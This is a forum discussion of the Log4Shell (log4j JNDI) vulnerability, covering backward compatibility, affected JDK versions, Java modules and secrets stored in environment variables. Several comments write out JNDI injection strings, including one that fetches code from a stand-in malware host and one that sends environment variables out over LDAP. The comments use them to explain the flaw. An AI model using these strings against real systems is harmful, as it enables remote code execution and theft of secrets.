So I spent a week trying to get ahold of someone to let them know how fucked up that is, which they avoided, until ultimately they claimed I was "threatening" them. I reached out to the "hidden hand" of the internet, did anyone have contacts with their MSP (with "National" and [edit: changed from "Infrastructure"] "Information" in the name)? But nobody did, so someone whose name would be recognized offered to tweet it.

Didn't take long to hear from MSP's Chief Cloud Architect. The story that they tell is that they'd like to turn the feature off but the customer won't let them.

Discuss.


The last part advises to be feature conservative to avoid promises all together. For that look to enterprise software where backwards compatibility is a legal agreement. This carries a bunch of alternative issues.


"Features" is a way too abstract thing to blame, tbh.

The elephant in the room here is the excessive dynamism allowed by default on the JVM platform. How many applications actually need fancy classloaders? Why isn't every step to get there - "loading a class from anywhere that isn't my JARs", JNDI, JNDI's LDAP backend, etc. - an explicit opt-in flag to the VM? Java's wide-open defaults are what made the blast radius of this huge.


Java's dynamic classloaders were one of it's original tantalising features. That you could have code from one place running somewhere else - "agents" could literally send their bytes to a device to execute there, run there and then erase themselves when they were done. It sounds crazy these days but it was all meant to be held together by the security model - built in at the core it was safe to let foreign byte code execute locally because the completely managed VM could enforce a security sandbox that allowed the code to do only exactly what it was meant to.

In some ways that is where this and all those features fell down ... if log4j had constrained those classes within a security sandbox it wouldn't matter what they did. But nobody understands or uses Java security permissions. The whole system is byzantine and drives people crazy whenever they do run into it. But if it had worked you could be asking the question, "why did log4j allow the permission for the remote code to do bad things" rather than "why was remote code allowed to execute".


There are popular languages that have `eval()`, so I don't see why blame Java only?


Don't get us wrong, eval() is terrible too.


Meaning that Log4J is certainly not the only library to have the problem, maybe the one with the larger footprint, what about JSP ?


[flagged]


The original is understandable. The person might not be a native speaker and calling their grammar "questionable" is too harsh, especially on an online forum. Also I don't think some of your "fixes" are necessary or meaningful.


[flagged]


Using semicolons to join sentences together isn't a super common style of writing for online comment sections. If you are unable to read a paragraph composed of shorter, more discrete sentences, that's on you.


> I attempted to fix your questionable grammar as[sic] to make your writing easier to understand

Muphry's Law strikes again! I think you meant "...so as to make..."

(+1 to the other reply - the original was perfectly readable)


Ideally you’d just remove the word ‘as’ for the most concise and correct sentence.


I have used logging all my life (2 decades career) and even log4j at times, but I can’t remember ever logging any messages that were expanded by the logging runtime (rather than at compile time or by the language runtime). Have I been missing out on anything important? Of course the configured log pattern is expanded like log level and date, but if I understand correctly this expansion can take place in log messages?


Yes — simple pattern expansion is pretty handy. For example:

    log.debug(“Added {} records”, added.size());
In this example, the cost of string concatenation / interpolation can be avoided when debug-level logging isn’t enabled, which is a lot cleaner to read than surrounding all the detailed logging with “if (log.debugEnabled())” checks.

I agree that the more complex expansions that log4j evolved to support are of pretty marginal use. The oft-cited examples — context information — are IMO better added as additional fields in the log record than developer-interpolated strings.


>simple pattern expansion is pretty handy. For example: [...] added.size()

I think you misunderstood the gp's scenario question. Your example of "added.size()" would be static code that was written by the friendly programmer and evaluated at compile time. We do expect that baseline functionality as reasonable and gp wasn't asking about that.

Instead, what folks are wondering about is dynamic and recursive template expansion of 2nd-parameter strings at runtime supplied by potential hostile adversary such as:

  log.debug("Added {} records", sAdversarialUserSuppliedString);
... and sAdversarialUserSuppliedString itself has an embedded "{}" with evil contents such as "${jndi:ldap://malware.net:1234/runviruscode}"

With that extra power and "convenience" provided by log4j, it becomes a backdoor "eval()" for arbitrary user-supplied code.

The gp's question restated could be: "Who legitimately needs that type of runtime template expansion in the 2nd parameter of sAdversarialUserSuppliedString and what have I been missing by not needing to do that? I seem to have gotten by on just using template expansion only in the 1st parameter."


Yes, and I think that both your example of expansion and the milder `log.debug("Added {} records. Build: ${buildId}")` (in which the logging infra evaluates "${buildId}") are bad, and mis-features in a logging infrastructure.


Exactly, my question was basically that: what scenarios are there that we need the logging to expand, that can't be expanded at the call site? The usual ones are e.g. the date and time (which are popularly set in some logging pattern like %date %loglevel %message). But beyond that, why would I need the logging infra to expand anything in the message portion?


Yes that expansion I use of course. But that’s what I meant by by the language runtime, e.g the log(String msg, object[] args) is merely used as an alias for log(String.format(msg, args)).


Gotcha. The difference is important, since a good log framework won't simply delegate, but will first check that the log level is enabled. This often matters, if there are any log statements in high-cardinality loops, since the memory pressure of creating all the strings adds up, but the trivial stack frames can often be optimized away / trivialized, depending on the language, runtime, etc.

I used to be a big believer in doing manual log-enabled checks, but man, does that make the code noisy. I still do that when I want to log something non-trivial to compute, but that's the exception, not the rule.


How we visualized and fixed runtime exposure due to vulnerable Elasticsearch, using ThreatMapper

https://deepfence.io/cve-2021-44228-log4j2-exploitability-an...

https://github.com/deepfence/ThreatMapper


> Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.

Does log4j not utilize a versioning scheme that has the notion of "breaking changes"? Anyone following semver, for example, could simply release a major to do away with an extremely troubling, and apparently well-known, back compat issue. Sounds like folks are right to criticize for poor decision making.


  > I want to be able to build knowledge of the library over a long time, to hone my craft.
This is my problem not only with programing languages but also with desktop environments and other tools. It's actually why I see people preferring LibreOffice Writer over MS Word in some fields, and why some people stick with e.g. PHP when NodeJS or Python would, in a stable world, be the objectively better technology.


I can't help but to wonder. How can we ever tell that this kind of vulnerability in open source library is accident of feature creep or simply incompetnence ?

What if this is a deliberate backdoor introduced by third party? I bet there are a lot of groups out there that would give leg and arm for having knowledge of this vulnerability for years it was out there in log4j.


Completely understandable critical point on why "backward compatibility" means so much. I remember submitting a bug report and a pull request in the Amazon SES SDK library for .Net that basically fixed an issue when trying to send an attachment to anyone in the BCC field, just to be told it couldn't be done since it would break backward compatibility...even when the feature itself was broken....



Isn't there a middle ground?

You can get the "safe" non-backwards-compatible update as free/open source, or you can pay for updates that retain backwards compatibility.

There is already a model for this, where companies will pay for support for old versions of software that have been declared EOL and no longer getting "free" updates. Microsoft offers this for older Windows NT versions, for example.


This could have been solved by just making the unsafe behavior opt-in via a command-line flag. Right now it is opt-out.


So how would you know if a feature is safe enough to keep around ?


Can someone explain exactly what bad thing someone can do with this exploit?

I understand passing a data to a second server and being able to exfiltrate environment vars. (Environment vars are evil.) But I feel like I’m missing a step. How does this let someone take over a machine? How can attacker upload and run their own binary that can actually do real damage?


It lets the hacker take over the machine because there are strings which are interpreted as (IIUC, I am not a java engineer) variables within a class, and you can express a remote URL to load a class from, apparently (through something like (jndi://... ldap... URL), resulting in fetching code from somewhere and running it, in the service of writing a log message. This is apparently being exploited in the minecraft ecosystem by simply writing chat messages containing the full exploit, which gets executed by both servers and clients.


By my understanding the RCE part of the exploit should not apply to recent java versions if the default options are used (minecraft shipped older version afaik, and all bets are off for unmaintained enterprise applications). The data extraction however will work on any java version if the server in question has the capability to connect to a server under the control of an attacker, as the network request will be performed even if the JVM options that should avoid the RCE are enabled. Big problem for client applications (as usually most outgoing connections are allowed). A bit harder to evaluate the impact in the enterprise context as many companies will not allow their servers to connect to "random" endpoints or at least require target-specific proxies to connect to the internet/intranet which makes this harder to exploit.


> resulting in fetching code from somewhere and running it

Ahhh ok. I didn’t realize the service would fetch and execute. Yikes.


You can execute arbitrary code into someone's server. You gain full control of whatever the user running your application is allowed to do.


Compare the shifting sands of Swift with the stability of awk.

That is not a good comparison..


Just keep rce for backward compatibility. Many poor users rely on it. Also the devs should refuse to fix this without gettin paid.


But who wanted this feature for “backward compatibility reasons”?


The thing is with such a large footprint you would have little desire to deal with "this release broke my application" type of ticket that would require you hours of attention before finding out what removed feature broke the user case.


Then don't deal with it.

It's free software without any warranty. No one is under any obligation to make any user happy.


Keeping the feature around is also a way of not dealing with it.


I just noticed that my Ubiquti Dream Machine Pro's IPS feature (which is just suricata) was just updated to block this attack.


How do you know what the UDM IPS does/does not block? Is it displayed somewhere? Is it updated at a different cadence to the firmware/software updates?


But the issue was also fixed in all recent versions of JVM's. So it is only an issue on "old" versions - right?


That's incorrect, while LDAP portion of this problem is mitigated im new JDKs there are other vectors of attack like RMI. It's by far the easiest and most severe vulnerability I've ever seen.


Do you have a source for that?



As they mention these are custom examples where you make lookup on user supplied string. But do you have an example of that? It seems highly unlikely to do jndi lookups based on user input.


${jndi:rmi://localhost:1099/ObjectName} will do the lookup to the lookup to the RMI server for ObjectName.


I get that this is a big deal (any remote code execution that is prevalent is a big deal).

But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

From https://www.veracode.com/blog/security-news/urgent-analysis-...

    JVM version - if lower than:
        Java 6 – 6u212 (java6 first released in 2006, this version appears unreleased?)
        Java 7 – 7u202 (java7 first released in 2011 this version appears unreleased?)
        Java 8 – 8u192 (from 2018)
        Java 11 - 11.0.2 (from 2019)
The current version of java is java17. Anything running on 17 or 14 (the last major release) isn't vulnerable.

Now, I get that major version upgrades are a hassle, but I haven't seen anyone address the "hey, you should have upgraded" elephant in the room.

(All java release dates from https://www.java.com/releases/ )


> But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

Please stop repeating this. The only attack that won't work on newer JVM versions is the one based on the LDAP server returning an ObjectFactory that redirects to a class file based on another remote HTTP server. However, that's absolutely not the only attack vector. LDAP itself has other attacks that are possible, and there are other JNDI integrations that also have different attacks, amongst other things, related to Java serialization (and once you can de-serialize bytes on someone's JVM, you have a smorgasbord of attack vectors to play with).

If your log4j version is resolving JNDI strings, you are NOT SAFE regardless of which JVM version you're using.


I wish your comment would get higher visibility.

To clarify, the vulnerability would make it possible to post server environment variables to any remote server, regardless of JRE version. That could easily end up being as catastrophic as an RCE.


Yeah that's a disaster, many applications/pods/docker containers store secrets in the environment. Even if it doesn't expose the service from the outside due to firewalls etc, its a(nother) way in for malicious internal users (which I believe are a large portion of, or the majority of, breaches).


Indeed. Anything which exposes a program’s environment to other non-root programs which are not sub-processes should be considered a security bug.


> the vulnerability would make it possible to post server environment variables to any remote server, regardless of JRE version.

I've been able to achieve RCE as well by still using LDAP, but a different lookup mechanism (if you learn about LDAP, you'll quickly realize there's several ways to do this). RCE does not require remote class loading, that's just the easiest way to achieve it.

If your JVM triggered the evaluation of any unsafe jndi string, you should assume an RCE is very likely possible on your environment.


Thanks. I can't edit my comment but I upvoted yours.


Hmm, why you can't edit your comment? There is an edit button in hackernews.


The button is available only for a time window (2h?) after the submission.

Which makes sense, on a message board (which HN is) the feature is mostly supposed to allow quick fixes over minor errors, not retroactive editorial work.


It's a big deal because most large users of Java aren't actually using the newer versions. It's very hard to source that claim, and I apologize for the lack of hard data, but in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

Some lame anecdotes:

Minecraft ships with a bundled version of Java 8. Most linux distributions still default to Java 11, and you have to explicitly ask for newer JDKs. Some distributions, like Void Linux, still only package Java 11. Many enterprise applications don't even use the system Java environments, and package their own outdated version of Java, sometimes in /opt, sometimes in their installation directory on Windows.

(edit: to this point, Minecraft apparently ships with 1.8.0_51 from 2015, and I'm sure I've seen similar with some Java applications at work. I imagine for programs that aren't servers listening on the network, the threat of exploitation seemed lower, and there was less of an (perceived) need to update even the version of Java. If it ain't broke, don't fix it, and all that.)

Regardless of the fact people should upgrade to newer Java versions, the reality is (IME) they ... haven't. And so many (very large!) corporations are relying on vulnerable versions of Java, which is why this is such a big deal.


The reason that most distributions only packaged Java 11 until recently is actually very simple: it was the current "LTS" version, which had a longer support window. So companies won't usually jump into Java 12, or 13... because it meant you had 6 months until that release would be considered unsupported.

That's why Java 11 has been receiving updates (latest one, 11.0.13, dates from October 2021) while Java 12, for example, got its last release (12.0.2) in 2019.

Now that Java 17 (released two months ago) is the new Java LTS version, you could expect most distributions to package it. For example, Ubuntu has been offering Java 17 for a couple of months.


Sure, and it's supported by more software than the newer versions (edit: because this wasn't clear, I mean I think the default JDK will remain 11 for a while, even on distros that package newer), which have been making a fair number of backwards incompatible changes, which seems to have had the effect of discouraging adoption of newer Java versions. I'm not a Java developer, so I don't really have personal experience or frustration with it, but it seems like I read "x was deprecated, then dropped, in versions <x>, <y> of Java" a lot, changes that would require pretty sweeping changes to codebases that relied on the old behavior/features.

A lot are still stuck on 8, and aren't even compatible with 11, much less 15 or 17. I think VMWare's vCenter software still uses Java 8 internally...


Yeah that's the biggest problem, a complex web of dependencies on old legacy applications built using JDK 8/11, not so much any language changes. Sometimes there's just no options to upgrade e.g. companies stuck on Oracle 12, can only use Flyway 5.1.4 etc, so that counts out Spring 2.5.x and so on and so on. Many libraries will eventually drop support for older JREs, and then you're left with a big bang approach and having to upgrade everything to the latest version, and that may include changes in the servlet/REST/etc specs, which can be a bit overwhelming for large legacy codebases. Its why tools like Dependabot are so important imo, they keep you up-to-date in incremental steps if you're vigilant, rather than have the POM/build.gradle ossify over time.


> in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

IMO, this is entirely Oracle's fault, for ramming through modules and --add-opens requirements starting in Java 9 that broke almost everything for no good reason.


add-opens was only required starting in 17, and modules, whose encapsulation wasn't even on by default until JDK 16, had little if anything to do with the migration issues from 8 to 9. They just happened to be 9's most famous feature, so they got the blame. Nearly all migration issues were due to libraries bypassing the Java spec in 8 and relying on internal implementation details, essentially becoming intentionally non-portable. Some of them had a good reason to do so, but nevertheless, that's what happened. Java 9 was one of the biggest Java releases ever, internal implementation details changed all over the JDK, so many libraries that had become tied to 8 broke. Now upgrading is no longer too big a deal because all popular libraries have long been fixed.

Modules, however, are related to those issues in that now when their encapsulation has finally been turned on (in 16 and 17), they will do their job of preventing this problem of bypassing the spec from recurring (the application is able to grant internal access to a library, but at least it knows there might be a potential maintenance and/or security issue to keep an eye on when it does).


I migrated personally (or overseen migration) of many projects from Java 8 (and even Java 6) to Java 11.

Modules in Java 9 were a bit controversial back then, so I guess that's the reason we hear a lot about it, but I haven't encountered an issue related to modules even once.

Most of the migration work that was needed was just upgrading libraries, or adding new dependencies for Java EE APIs that moved out of the JDK.

And why libraries were incompatible? Relying on undocumented internals is one thing, but the funny thing is that a surprisingly large number of libraries broke because they relied on the format of the Java version string. When it changed from 1.8 to 9.0, they suddenly saw a "Java Version 0" and didn't know what to do with it.


> When it changed from 1.8 to 9.0, they suddenly saw a "Java Version 0" and didn't know what to do with it.

That's true. That change was probably the biggest single "breaking change" in that release.


My complaint about the --add-opens fiasco is that it was basically a breaking change for the sake of being a breaking change, rather than one that was necessary to fix some bug or add some feature.

> they will do their job of preventing this problem of bypassing the spec from recurring

This feels like curing cancer by killing the patient.


> My complaint about the --add-opens fiasco is that it was basically a breaking change for the sake of being a breaking change, rather than one that was necessary to fix some bug or add some feature.

add-opens, which, again, has been required only since JDK 17, is absolutely essential for Java's security (it is impossible for any Java code to make any strong guarantees without it), and to prevent the kind of problems we've seen when migrating from 8 to 9. The only thing it breaks is the ability to write non-portable libraries without the application knowing about it. There is not a single line of code that would be affected by it that wouldn't have also been susceptible to any change in internal details, which can happen in any release without warning. Since the rate of internal implementation details is only going to grow with the growing investment in Java, this change helps warn against potential issues due to non-portable code.

> This feels like curing cancer by killing the patient.

JDK 17 adoption is pretty impressive (and faster than 11's). Doesn't seem like the patient is dead.


> add-opens [...] is absolutely essential for Java's security (it is impossible for any Java code to make any strong guarantees without it

How do you figure? What kinds of guarantees?

> to prevent the kind of problems we've seen when migrating from 8 to 9

But it only prevented it from happening later by making it happen now! There's a good chance that most of the programs broken by modules would never have broken otherwise.


> How do you figure? What kinds of guarantees?

Any, but specifically around security (almost all security is provided by certain preconditions being met, namely that method foo() is called only immediately after ensuring that method bar() returns true, or that an object of type Baz is always initialised in a certain way.

Prior to modules, the meaning of any line of Java code anywhere -- including in the JDK itself -- was subject to change by any other line of code in any loaded library through various kinds of monkey patching. You could not guarantee anything. With modules, if `foo` is private, and the only call to it is in `if (bar()) foo();` you can guarantee that foo is only called when bar is true.

Now, strong encapsulation isn't airtight yet, and there are still some loopholes left to let straggler libraries catch up or because there aren't replacements to some unsafe operations yet, but it will be very soon.

> There's a good chance that most of the programs broken by modules would never have broken otherwise.

First, almost all problems migrating to 9+ were because of such non-portable code, and the disruption was quite significant, and the rate of internal change is increasing. Second, this makes it happen now instead of happening, perhaps on a smaller scale, at each and every release for the next decades.


> Any, but specifically around security

Ah, so they had to add it because they plan on removing the security manager API. So it is a breaking change for the sake of another breaking change.


The Security Manager API hasn't been an important Java security feature for many years. It was a security feature for Applets, and over the past decade it's been used by a few applications mostly for monitoring/toy sandboxing. In any event, a vanishingly small number of applications use it. Strong encapsulation is part of a long-term effort to make Java more secure, as threats are changing.

Also, encapsulation isn't a breaking change. Java's strong backward compatibility commitment is with respect to the Java SE specification. No APIs are affected. It's only internal classes that have always been subject to change, and with clear warnings that they must not be accessed, that are encapsulated.


Are Python, Ruby, and Lua all inherently insecure? Why do so many programs that care about security use them? They all allow monkey patching, after all.


Obviously, Java is used for much more critical applications than Python, Ruby, or Lua, but I don't know enough about their security strategy. Just as Java's performance is constantly being improved, so does its security.


What language besides Java has a "feature" that requires a whitelist to use reflection, that you can't just say "everything" for? Or is Java the only secure programming language that exists?


Strong encapsulation isn'y a whitelist for reflection. It forbids the turning off of access control by arbitrary libraries (you do know that even before modules you had to explicitly setAccessible if you wanted to break through access control) -- unless the application explicitly allows it. Some languages don't have reflection at all, and among those that do, Java is clearly the language that is by far most popular for serious business-critical applications.


> you do know that even before modules you had to explicitly setAccessible if you wanted to break through access control

Yes, I do know that, and I'm fine with it. If it still worked then I wouldn't mind modules. My complaint in particular is that a command line whitelist is needed for setAccessible to work anymore.


Right, but the command-line is intentional: it is intended to make the application aware of potential maintenance and/or security issues, and setAccessible is really a potential maintenance and/or security issue. The only argument against it would be the desire to allow libraries to impose such risks on applications without the application knowing about it. I understand why some library authors would not like their users to know their libraries pose such a risk, but obviously the applications should take precedence.


My issue isn't that it needs a command line parameter. It's that you need to create a whitelist that enumerates everything that anything is going to use individually. I'd be fine with modules if --add-opens had a "let this module reflectively access everything" wildcard, or if --illegal-access=permit were never removed.


But that wouldn't express what the potential issue is. You want to know that internal changes in which modules could break you, and/or in what way you're expanding the security attack surface area. Such a library needs to tell you what "bad" things it does and give you a list of modules whose encapsulation in breaks open that you could put on the command line.


At any moment, Oracle could change the package names of all internal code from `com.sun` to `com.oracle` or to have a randomized prefix, which would break all those programs as well.


They could, sure, but that would again be a breaking change for the sake of being a breaking change. Also, maybe since those "nonportable" things are so widely used, Oracle should just add them to the API officially.


Java's backward compatibility applies only to the spec, i.e. the API. If any change to any method in the ~6M MLOC standard library is a "breaking change," then nothing all changes are "breaking changes," and it doesn't matter if there's good reason for them or not; we want things to not break, so internal code needs to be encapsulated. As to the last remaining popular "non-API-APIs", which is mostly just Unsafe, it is, indeed not encapsulated, and over time it will be shrunk only as replacement APIs are available.


I would go the other way around - it's entirely Oracle's fault for trying to be too compatible with unfortunate mistakes made in the past. Java Serialization is the root of all these things, and should have been deprecated and more safeguards should have been added. Perhaps even an equivalent of --add-opens for which classes are safe to serialize!

This would certainly have broken a large number of software, but it's the right way to go. Whichever way you define the "compatibility promise", I think security overrides that.

At least it looks like Oracle is going this way[1], I just wish that it would have been sooner.

[1] https://inside.java/2019/11/07/whywehateserialization/


The log4j exploit was based on remote class loading, not serialization... though if your JVM protected you against remote class loading, it's indeed correct that one way to bypass that protection was by using a serialization attack.


It has been proven that if platforms don't ramm through, their users will keep using the old ways as long as they can.


Where has this been proven? And what's wrong with using the old ways?


Windows XP, Java 8, Python 2, C++98,CLI apps like pre 1980's,..., plenty of examples.


I think the most recent Minecraft release (1.18) actually requires Java 17?


They've only recently been bumping Java versions.

For the longest time, it was 6, then 8, and it stayed on 8 for years. Iirc 1.17 was a jump to Java 16 after a lot of internal reworking, and I guess with Java 17 being LTS, thats why they've moved to that.


So the parent poster was in fact wrong about Minecraft using Java 8.


Not really. Only the two most recent major versions of Minecraft use Java 16/17. A lot, possibly most, of the online community still plays on old versions 1.8.9 and 1.12.2 which use Java 8.


> 1.8.9 and 1.12.2

Correct me if I'm wrong, but isn't the first favored by pay-to-win servers and pvp specializing servers, while 1.12.2 is favored for modding? Both seem pretty niche to me, albeit noisy niches. There have been several substantial updates to the game since 1.12 and I'm quite sure most players are presently on 1.18 or at least 1.17. And I don't have much sympathy for the plight of those P2W servers.


1.14.4 works just fine on jdk 1.8, modded or otherwise. I know this, because I helped get it running properly with Forge integration on Raspberry Pi, and am working on building out an Aarch64 base Linux image for more recent versions to leverage the 8GB version of the Pi for maybe supporting a mod or two. Someone else may have done it already, but it's more an exercise in cross-compiling for me.

The lack of a 64 bit JDK build was the big blocker a couple years ago. Haven't checked back to see if Raspbian or anyone else got around to it.

I can second that modules were a way bigger deal than people here seem to be willing to admit to. I avoided 9+ like the plague because redefining one of your base visibility modifiers and the inevitable charlie-foxtrot that would entail, plus Oracles license shenanigans was just not something I was willing to wade through.


At one point Oracle changed the licensing, which caused enterprises to stop upgrading.


So, the root of all problems is that companies don’t want to pay, not even when professional, paid support is available. Why complain, then?


With OpenJDK, do companies still license Java?


OpenJDK is GPL-2 + linking exception; Similar to LGPL. Dunno what that other guy is talking about.


Maybe there were some, mainly because people don't read and rather rely on tweeter feeds from urban myths.


Minecraft ships with the latest 17.0.1 now (I run Java at MSFT, we supply their bits )


>It's a big deal because most large users of Java aren't actually using the newer versions. It's very hard to source that claim, and I apologize for the lack of hard data, but in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

It should still not be a big deal, because there are mitigations in place for Java 11 and Java 8 - just upgrade to the latest patch revision: 11.0.2 and 1.8.0_192 or later exactly like an operating system security patch. Right now, it just feels like a big deal because everyone likes to pile on Java.


Regrettably I have multiple products, such as pos software from Oracle, that break on minor point release java updates.


According to the original RCE post:

> JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector.

So people just need to stay up to date on the latest patch version. Latest 8x is 8u312 and 11x is 11.0.13.

So Java 11 and 8 have some mitigation already in place, but people need to be applying patches like they should for all other critical system software.


But then whose fault is it? Software will always be compromised sooner or later by hackers looking for exploits.

I know Microsoft just threw the keyboard at the wall and said "fuck it everyone gets forced to update".


> But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

Recent versions were still susceptible to e.g. exfiltration of env vars, which may often contain secrets.

${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}


This here is the reason why the current obsession with storing everything configuration related, including secrets, in environment variables is a bad idea. This is without even touching on the fact that the environment is propagated to every child process every time.


> including secrets, in environment variables is a bad idea.

I don't think this is the lesson to take away here. Arbitrary remote read of environment variables is not a common issue.

Also you can easily not propagate secrets to a child process. But there isn't a ton of point to that on most systems since if you can't trust your child process just not passing in the secret is not gonna cut it.


Which other place do you suggest for secrets? File access is even more common security bug, also may be accessed by subprocesses and even other processes. Cmdline argument don't propagate to childs, but are accessible. I don't know about any other options that would be reasonably easy to use.


Files have all sorts of protection mechanisms available, both built in to the file system and on top of it, is traditionally used to store secrets, and doesn't generally leak. So that should be the starting point.

Command line argument would be visible in the process table, hopefully no one would suggest that. It also is not persistent, so it generally needs to be fed from someplace anyway. Generally a file. This is something it shares with environment variables.


Stdin and keep in variables only. I know it’s a lot less convenient but if you are looking for security this is one level up.

Files in /tmp that your application deletes immediately after read is another.


In git, as encrypted files. It couldn’t be easier: https://neosmart.net/blog/2020/securestore-open-secrets-form...


TBF,files should be fine if we use something like the openbsd unveil mechanic


Okay, yes, but to date, to a first approximation, nobody does that. And yes, that's unfortunate, but in the world we live in, and the world we will live in for the near future, environment variables seem no worse than any other option, regardless of ways that other options could be made better.


Env vars are strictly worse than files because of how easy they are to access. You need shell code of some sort to read a file assuming you don’t privilege drop whereas env vars are persistently available to everything everywhere.


Huh? Environmental variables are only available to a process, any children the process has, any other process running as the same user ID, and the root user on a given POSIX compliant system.

E.g if I do this:

  export FOO=bar
processes running as other user IDs (unless root) will not know FOO is “bar”. Actually, even other processes running as me/root won’t know FOO’s value until I spawn a child process after that “export” command—environment only becomes visible outside a process when it runs execve() and passes its environment on.

An environmental variable is about as safe as a file with 600 or 700 perms (i.e. make a file be set up with POSIX ACLs to be read only by the owner of the file): If user separation is done so insecure processes run with a different user/group ID (and modern *NIX system gives each user its own default group), the cracker still has work to do before getting important secrets in our environment.

Also, FOO being bar in the environment (i.e. we can see it with getenv() ) will only be visible to the current any child process after “export FOO=bar”.

If you’re able to run getenv() to get at the environment, or able to read (in Linux) /proc/$PID/environ to see the environment of other processes running as you, you will generally also be able to run open() to get at files.

Environment leaking is a serious bug in a *NIX/POSIX system; If I can, as “Alice”, view anything in the environment belonging to “Bob”, that’s a serious security bug which needs to have a CVE number.



Thank you for the link and information.

To be fair, while a concern, that’s not “everything everywhere”. That’s the current process, child processes (even if setuid), root, other processes running as the same user, and maybe processes with different user IDs sharing the same d-bus (D-bus is not used on servers, only desktop systems). I consider that slightly but not much more leaky than an unencrypted chmod 600 or chmod 700 permission file.

It’s more secure than, say, command line arguments (which can be seen by any process on the same system).


> dbus is not used on servers?

In my experience dbus has shown up on embedded devices, routers, servers, desktops, etc. Maybe it’s not being used and I don’t know it… Avahi (the mDNS daemon & tool), for example, uses dbus.

I would say containers are more to blame for making env var secrets pretty okay. But people should be aware of what the systemd man page says about env vars because there are scenarios where persisting secrets in a spot easily queryable via procfs and/or dbus is not okay.

And systemd provides a way to correctly pass secrets by allowing you to specify a credential blob that is accessible via the filesystem and properly restricted to the target service. So there’s an easy way to securely pass secrets, people should use that before reaching for env vars.

https://www.freedesktop.org/software/systemd/man/systemd.exe...


Thank you again for the informative reply. I saw two dbus-daemons running on my Ubuntu server; I killed the user d-bus daemon process running as me and nothing seems to break, so while it’s there, it doesn’t seem to be used by anything on my server.

While I do note that systemd man page, it goes in to no detail about how dbus leaks the environment.

Looking at the D-Bus specification [1], org.freedesktop.DBus.UpdateActivationEnvironment is the only thing which concerns itself about the environment. It says that the “session bus activated services inherit the environment of the bus daemon”, so it looks like the D-Bus leakage is any system-level environmental variables set when the D-Bus daemons are started, or any variables set using UpdateActivationEnvironment.

The concern here appears to be that system-level environmental variables aren’t safe. I don’t see anything about a user process setting something like export FOO="top secret password" being more unsafe than a chmod 700 or chmod 600 file.

I have already noted the various ways environmental variables can leak on this page:

https://github.com/samboy/rg32hash/blob/master/C/microrg32.m...

I will update the D-Bus information there based on what I read in the D-Bus spec.

[1] https://dbus.freedesktop.org/doc/dbus-specification.html


> I saw two dbus-daemons running on my Ubuntu server; I killed the user d-bus daemon process running as me and nothing seems to break, so while it’s there, it doesn’t seem to be used by anything on my server.

Every systemd service is exposed on a dbus path in systemd. You can query a service's environment like so:

    $ systemctl status foo
    ● foo.service - Can we read this service's environment over dbus?
         Loaded: loaded (/etc/systemd/system/foo.service; static)
         Active: active (running) since Tue 2021-12-14 23:00:10 PST; 6min ago
       Main PID: 104167 (sleep)
          Tasks: 1 (limit: 9366)
            CPU: 1ms
         CGroup: /system.slice/foo.service
                 └─104167 sleep 3600
    $ qdbus --system org.freedesktop.systemd1 /org/freedesktop/systemd1/unit/foo_2eservice org.freedesktop.systemd1.Service.Environment
    Error: org.freedesktop.DBus.Error.AccessDenied
    Rejected send message, 2 matched rules; type="method_call", sender=":1.761" (uid=1000 pid=104282 comm="/usr/lib/qt5/bin/qdbus --system org.freedesktop.sy") interface="org.freedesktop.systemd1.Service" member="Environment" error name="(unset)" requested_reply="0" destination="org.freedesktop.systemd1" (uid=0 pid=1 comm="/sbin/init splash ")
    $ sudo qdbus --system org.freedesktop.systemd1 /org/freedesktop/systemd1/unit/foo_2eservice org.freedesktop.systemd1.Service.Environment
    FOO=secret-secret
So you can read it but it seems systemd does enforce some sane default permissions on who can read the environment.


Where else do we put them? Cloud secret stores? Where do we store the credentials for that?


8 and 11 are LTS releases, and are still supported. 17 is the new LTS, but it's only been out for 2m. See https://endoflife.date/java


Yeah, a couple years ago I had to decide what version of Java to use in an environment where it needed to run for as long as possible with minimal maintenance, and I found myself in the weird position of intentionally shipping 8 because it had longer support than the newer versions we could have used. It's a weird position, but rational.


If this survey is to be believed, as of last year, nearly everyone is using either Java 8 or Java 11, with Java 8 being the overwhelming favorite with almost 60% of respondents reporting using it.

https://www.jrebel.com/blog/2020-java-technology-report


Fair. There's been some licensing ... well shall we call them mishaps ... in the last couple of years. That I think has kept a lot of folks on older versions of Java.

But even if folks are okay on java8 (first released in 2014!) there is a version of java8 that is not vulnerable and it has been around for 3 years.


It’s not the licensing, it’s the amount of incompatibilities JDK 9 introduced.

Also, current JDK versions are still vulnerable: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj...


Precisely. JDK 8 -> 11 is not "drag and drop". While that was mostly the up through JDK 8, the JDK 9 changes are a large step that need to be hurdled, and it's easier said than done.

Plus if you're working on legacy app servers, you're bound to whatever they are running outside of what you actual application supports. Then add in the whole JaveEE -> JakartaEE transition that was ladled on top of the JDK 8-> 11 transition, and it wasn't just a can of worms, but a kettle of fish and a barrel of monkeys all at once.


Both the licensing issues and the upgrade cost are largely myths.

Licensing is only an issue if you want to keep using the free Oracle JDK, but there is seriously no need to.

JDK upgrades were never drag and drop. When we upgraded Java 6 to Java 8 we had just about the same amount of issues we had when upgrading Java 8 to 11. Some libraries had to be updated. Bloated Application servers like Tomcat and Glassfish (let alone beasts of legend like WebLogic) needed an entirely new major version to cope with that.

The misconception that Java 11 is an especially rough upgrade comes from exaggerated worries about modules and perhaps the faster rate of change. 8 years have passed between Java 6 to Java 8, but only 4 years have passed between Java 8 to Java 11.


Using Java 8 doesn’t mean you have to use 8_51 or whatever - you can use 8_300+ or whatever the current is.


Simply using a modern JDK does not fully resolve the issue. See here: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj...


It would probably be a shocker to you, but there are still companies operating on cobol. Because the software does what it was supposed to do and does it well.

If no functional changes are required, software should be just fine running for decades.

Not every company is able to spend on continous development. Often times rewriting something ends up a big cost that never pays for itself.


openjdk version "11.0.11" 2021-04-20 (latest in Ubuntu?)

